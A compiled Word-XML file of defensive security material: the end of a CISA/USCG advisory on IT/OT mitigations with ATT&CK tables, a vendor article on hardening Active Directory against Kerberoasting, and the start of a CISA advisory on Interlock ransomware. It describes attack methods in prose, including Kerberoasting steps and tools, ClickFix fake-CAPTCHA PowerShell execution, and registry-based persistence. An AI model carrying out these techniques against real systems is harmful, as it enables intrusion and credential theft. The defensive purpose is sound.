        <w:t>Implement MFA [CPG 2.H] in addition to strong passwords (i.e., passwords 15 characters or longer). Additional Mitigation Recommendations to Strengthen Cybersecurity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CISA and USCG recommend critical infrastructure organizations implement the following additional mitigations (not tied to specific findings from the engagement) to improve the cybersecurity of their IT and OT environments: Secure RDP from the IT to OT environments by deploying dedicated VPNs for all remote interactions with the OT network. Using RDP without strong authentication practices can lead to credential theft. Additionally, RDP does not inherently segregate or closely monitor user sessions, which can allow a compromised session to affect other parts of the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy VPNs with strong encryption protocols such as SSL/TLS or Internet Protocol Security (IPsec) [CPG 2.K] to safeguard data integrity and confidentiality; use MFA [CPG 2.H] at all VPN access points to ensure only authorized personnel can gain access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure VPN gateways to perform rigorous security checks and manage traffic destined for the OT network, ensuring comprehensive validation of all communications through pre-defined security policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>VPN gateways should function as the primary enforcement points for access controls, scrutinizing every data packet to detect and block unauthorized access attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Align the VPN traffic monitoring with the DMZ's capabilities to regulate and inspect the data flow between IT and OT environments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>As part of the broader network architecture review, ensure the VPN infrastructure is correctly segmented from other network resources [CPG 2.F] to prevent any spillover effects from the IT environment to the OT network, containing potential breaches within isolated network zones. Within the VPN configuration, enforce strict routing rules that require all remote access requests to pass through the DMZ and be authenticated by bastion hosts. This minimizes the risk of unauthorized access and ensures that all remote interactions with the OT network are monitored and controlled.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If wireless technology is employed within the OT environment, implement Wi- fi Protected Access 3 (WPA3)-Enterprise encryption with strong authentication protocols like Extensible Authentication Protocol (EAP)-TLS to ensure data confidentiality and integrity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy and continuously monitor Wireless Intrusion Prevention Systems (WIPS) to detect, prevent, and respond to unauthorized access attempts and anomalous activities within the wireless network infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable unnecessary features like Service Set Identifier (SSID) broadcasting and peer-to-peer networking, enable Media Access Control (MAC) filtering as an additional layer, and keep wireless firmware updated. Validate Security Controls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addition to applying mitigations, CISA and USCG recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. CISA and USCG recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 1 to Table 9). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program-including people, processes, and technologies- based on the data generated by this process.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CISA and USCG recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. Contact Information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Critical infrastructure organizations are encouraged to report suspicious or criminal activity related to information in this advisory to: CISA via CISA's 24/7 Operations Center (SOC@mail.cisa.dhs.gov or 888-282- 0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Coast Guard, for Maritime Transportation System Subsector organizations. Report malicious activities to the Coast Guard's National Response Center (1-800-424-8802) per Navigation and Vessel Inspection Circular (NVIC) 02-24 when facilities observe any unusual activity or interruptions to their network. For additional Coast Guard resources, please visit the Coast Guard Maritime Industry Cybersecurity Resource Center website. CGCYBER can also be contacted at maritimecyber@uscg.mil. Additional Resources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more information on improving cyber hygiene for critical infrastructure IT and OT environments, please see the following additional resources authored by CISA, CGCYBER, and international partners: CGCYBER 2024 CTIME report Joint Guidance Best Practices for Event Logging and Threat Detection Joint Guidance Principles of Operational Technology Cyber Security Disclaimer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information in this report is being provided "as is" for informational purposes only. CISA and USCG do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and USCG. Version History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July 31, 2025: Initial version. Appendix: MITRE ATT&amp;CK Tactics and Techniques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See Table 1 to Table 9 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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 Initial Access Technique Title ID Use Valid Accounts T1078 Malicious actors could use access to valid accounts for access to IT and OT networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Valid Accounts: Local Accounts T1078.003 Threat actors could use credentials obtained for local administrator accounts to gain administrator access to workstations or services that use the account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account Manipulation T1098 Malicious actors could modify existing accounts or create new accounts to maintain access or escalate privileges.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2: Execution Technique Title ID Use Command and Scripting Interpreter T1059 Malicious actors could use script interpreters like PowerShell to execute commands and scripts.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3: Persistence Technique Title ID Use Boot or Autostart Execution T1547 Malicious actors could configure autostart execution paths to ensure persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Hijack Execution Flow T1574 Malicious actors could hijack the execution flow of applications and inject malicious code.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4: Privilege Escalation Technique Title ID Use Domain or Tenant Policy Modification T1484 Malicious actors could modify domain policies to escalate privileges or evade defenses.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5: Defense Evasion Technique Title ID Use Modify Registry T1112 Malicious actors could install malicious browser extensions on compromised systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Impair Defenses: Downgrade Attack T1562.010 Malicious actors could exploit vulnerabilities in older systems to force a downgrade to a less secure mode of operation.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Table 6: Credential Access Technique Title ID Use Unsecured Credentials: Credentials in Files T1552.001 Malicious actors could search for and exploit credentials stored in unsecured files. OS Credential Dumping T1003 Malicious actors could extract credentials from memory or storage from unsecured workstations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Adversary-in-the-Middle T1557 Malicious actors could position themselves between networked devices to intercept credentials and other data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Brute Force: Password Guessing T1110.001 Malicious actors could systematically guess possible passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Brute Force: Password Cracking T1110.002 Malicious actors could recover plaintext credentials after obtaining password hashes or other similar credential material.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Brute Force: Password Spraying T1110.003 Malicious actors could attempt to use a common password against different accounts to try to obtain account access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Brute Force: Credential Stuffing T1110.004 Malicious actors could try to use credentials gained from an unrelated account to gain access to a desired account in the victim's environment.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7: Discovery Technique Title ID Use System Network Connections Discovery T1049 Malicious actors could map network connections to identify paths to OT systems from an unsecured IT workstation with access to the OT network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Network Configuration Discovery T1016 Malicious actors could use an unsecured workstation to discover network configurations.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8: Lateral Movement Technique Title ID Use Remote Services: Remote Desktop Protocol T1021.001 Malicious actors could use valid credentials to establish an RDP connection to access a workstation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Services: SSH T1021.004 Malicious actors could use valid accounts to establish an SSH connection to a workstation.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9: Command and Control Technique Title ID Use Application Layer Protocol T1071 Malicious actors could use application layer protocols to communicate with systems they compromised while blending in with existing network traffic.</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 While CISA used PowerShell to review these configuration settings, they can also be identified by running a search in any text editor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[2] For more information, see Schannel - Microsoft Learn.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[3] Reference the Purdue Model for ICS Security as a guide for layered security zones and assess compliance with IEC 62443 network and system security standards; organizations may use this version of the model developed by Department of Energy (DOE) as a guide: Purdue Model Framework for Industrial Control Systems &amp; Cybersecurity Segmentation.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2025.07.31 20:49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-212a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How to harden your Active Directory against Kerberoasting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by Specops Software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July 23, 2025 10:02 AM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Kerberoasting is a common attack targeting Microsoft Active Directory, enabling attackers to compromise service accounts with low risk of detection. Because it manipulates legitimate accounts, it can be highly effective. However, robust password security can keep the criminals at bay.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First, what is Kerberoasting? The name comes from ‘Kerberos', the authentication protocol used in Active Directory, which verifies a user's identity or that of a computer requesting access to resources.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Kerberoasting is a privilege escalation attack where a perpetrator in control of a standard Windows user account attempts to crack the password for an account with a Service Principle Name (SPN); if successful, they can then escalate their attacks to threaten any part of the architecture connected to the targeted account. Multi-pronged attack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How does an attack work in practice? It's slightly complex, but there are five key stages: The attacker begins by exploiting an existing Windows user account in Active Directory. They may have gained access to this account using any of the traditional, nefarious methods, such as stealing credentials via phishing or malware.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>They then identify an account on the active directory with an SPN attached, using tools such as GhostPack's Rubeus. These service accounts are dangerous because they often have high-level permissions or domain administrator access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using the account they control, the attacker requests a service ticket from the ticket granting service (TGS) in Active Directory. This ticket contains the SPN in focus and is encrypted with the hash of the target account's password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The attacker takes the ticket offline, concealing their activities: there is no longer any unusual network traffic that might give them away. Finally, the perpetrator uses brute force techniques to attempt to crack the SPN password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hash, enabling them to recover plaintext service-account passwords. They can then access anything that account can access.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Secure your Active Directory passwords with Specops Password Policy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Verizon's Data Breach Investigation Report found stolen credentials are involved in 44.7% of breaches.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Effortlessly secure Active Directory with compliant password policies, blocking 4+ billion compromised passwords, boosting security, and slashing support hassles! Try it for free Adversary advantages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Kerberoasting is a complex process, with a range of tools available online to both detect accounts with an associated SPN and to then break into the ticket. However, it has significant advantages for attackers: They can exploit any user account to request a ticket from the AD. One account is just as dangerous as another.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Because they attempt to crack the password hash offline, they can essentially keep trying to crack the password hash without detection. Tools like John the Ripper or Hashcat can be deployed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Kerberoasting doesn't rely on malware, meaning traditional solutions like antivirus software aren't effective. How to protect your Active Directory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It's easy to see why Kerberoasting would appeal to cybercriminals. However, organizations can take steps to protect their AD from the danger.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce robust SPN passwords: Each SPN-enabled account should be protected by long, random, non-reusable passwords. If it's 25 characters or more, the chances of a successful Kerberoasting attack are hugely diminished. Use AES encryption for service tickets: AES-based encryption is more secure than efforts based on RC4. When you configure domain controllers and Kerberos settings to favor AES256 over legacy RC4 encryption, you hugely increase the cost and difficulty of cracking ticket hashes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reduce SPN footprint: It's wise to audit your existing SPN-enabled accounts, consolidating duplicate accounts or disabling them altogether. The goal is to minimize the number of individual SPN credentials that you need to protect. Group Managed Service Accounts (gMSAs) can also be useful, automating password management for additional security.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Control privileges: Restrict service accounts to only the permissions they require, ensuring they aren't members of high-privilege groups. Tiered administration models can also ensure that compromised SPNs can't be escalated to domain-wide privileges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor Kerberos traffic for anomalies: Keep an eye out for early-stage Kerberoasting reconnaissance efforts. For instance, security information and event management (SIEM) solutions can be configured to detect unusual patterns, such as spikes in TGS requests for a single SPN. Scan your AD for stale accounts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Specops Password Auditor is a read-only tool that lets proactively scan for weak, reused, and breached passwords in your Active Directory environment. It help audit service accounts in the domain for password security and help give visibility to service accounts with administrator permissions.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Your exportable report gives you a full view of stale accounts in your organizations, which are often a starting point for Kerberoasting attacks. Download your free tool here. Prevent Kerberoasting attacks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Kerberoasting is a complex form of attack, built across different stages. However, one thing is certain: password security sits at the heart of your defense.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works on two major levels.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First, before attackers can request a service ticket tied to an SPN account, they need to have access to another user account that they can manipulate. They target this through well-known means, such as phishing or malware.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Multi-factor authentication (MFA) is also key to protecting accounts against this danger, with passwords a key component.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ensuring your passwords meet the most stringent security demands, you can protect your organization - and its employees - from the first stage of a Kerberoasting attack.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Second, there's the attack itself. As we've seen, Kerberoasting and brute force tactics struggle against lengthy, unique passwords of 25 characters or more. By ensuring all your SPN-linked accounts are protected by such passwords, you take a huge step towards securing your Active Directory.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Specops Password Policy makes it easy to block weak passwords and enforce the creation of strong, unique passphrases. On top if that, it continuously scans your AD against a growing list of over 4 billion compromised passwords, alerting end users if their password is found to be breached.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Interested to know how this could work in your environment? Get in touch for a demo.</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and written by Specops Software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2025.07.23 19:11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/how-to-harden-your-active-directory-against-kerberoasting/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#StopRansomware: Interlock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Release Date July 22, 2025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Alert Code aa25-203a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Malware, Phishing, and Ransomware, Cyber Threats and Advisories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Actions for Organizations to Take Today to Mitigate Cyber Threats Related to Interlock Ransomware Activity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Prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and training users to spot social engineering attempts.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Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date.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Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization.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Implement identity, credential, and access management (ICAM) policies across the organization and then require multifactor authentication (MFA) for all services to the extent possible.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Summary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Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.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Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC)-hereafter referred to as "the authoring organizations"-are releasing this joint advisory to disseminate known Interlock ransomware IOCs and TTPs identified through FBI investigations (as recently as June 2025) and trusted third- party reporting.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Interlock ransomware variant was first observed in late September 2024, targeting various business, critical infrastructure, and other organizations in North America and Europe. FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems. FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups. Actors were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim's system. Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network.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Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked.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FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Interlock ransomware incidents.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Download the PDF version of this report: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AA25 203A StopRansomware Interlock (PDF, 727.00 KB )</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a downloadable copy of IOCs, see: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AA25-203A Interlock STIX XML (XML, 63.69 KB )</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AA25 203A Interlock STIX JSON (JSON, 57.47 KB ) Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 17. See the MITRE ATT&amp;CK Tactics and Techniques section of this advisory for tables mapped to the threat actors' activity. Overview</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Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe. These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim's ability to provide their essential services.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Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser. To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors' threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.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authoring agencies are aware of emerging open-source reporting detailing similarities between the Rhysida and Interlock ransomware variants.1 For additional information on Rhysida ransomware, see the joint advisory, #StopRansomware: Rhysida Ransomware. Initial Access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FBI has observed Interlock actors obtaining initial access [TA0001] via drive-by download [T1189] from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software (see Table 5 for a list of filenames).2</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some instances, FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) [T1189]. The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process [T1204.004].3</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Note: This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.4 Execution and Persistence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Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) [T1105] designed to execute a PowerShell script [T1059.001] that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in [T1547.001], establishing persistence [TA0003].</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FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification [T1547.001]. To do so, Interlock actors used a PowerShell command [T1059.001] designed to add a run key value named "Chrome Updater" [T1036.005] that uses a specific log file as an argument upon user login. Reconnaissance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 facilitate reconnaissance, a PowerShell script executes a series of commands [T1059.001] designed to gather information on victim machines (see Table 1). Table 1. PowerShell Commands for Reconnaissance PowerShell Command Description WindowsIdentity.GetCurrent() Returns a WindowsIdentity object that represents the current Windows user [T1033].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
